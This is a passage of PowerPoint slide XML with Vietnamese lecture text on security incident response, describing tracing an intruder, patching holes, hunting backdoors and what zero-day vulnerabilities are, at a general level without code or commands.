              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nếu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mọi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chuyện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>được</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kiểm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>soát</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>theo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dõi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đột</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>danh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tính</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nếu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nguồn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>doanh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đủ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>loại</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tấn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>công</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đồng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thời</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hiện</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> tung </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bản</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vá</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bảo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>mật</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>và</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lưu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ý </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>phải</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tìm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>để</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tránh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kẻ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đột</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nhập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>truy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>vào</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hợp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pháp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Về</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cách</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lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zeroday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>này</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thiếu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sót</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người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lập</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trình</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hệ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thống</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đã</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>bỏ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> qua </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hoặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cũng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thể</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>người</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>làm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ra </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>không</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>có</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>gì</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tuyệt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đối</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="372992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3C491F-7871-455E-9938-F32FBE368D45}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="677334" y="170121"/>
            <a:ext cx="8596668" cy="5871241"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>zeroday</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>tất</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>cả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đều</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>là</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>những</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiêm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trọng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>như</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quả</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>thực</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>nghiệm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>trên</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hầu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hết</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>các</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>lỗ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>hổng</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> zero day </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đều</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việc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>leo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> thang </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>đặc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>quyền</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> hay </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>chiếm</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
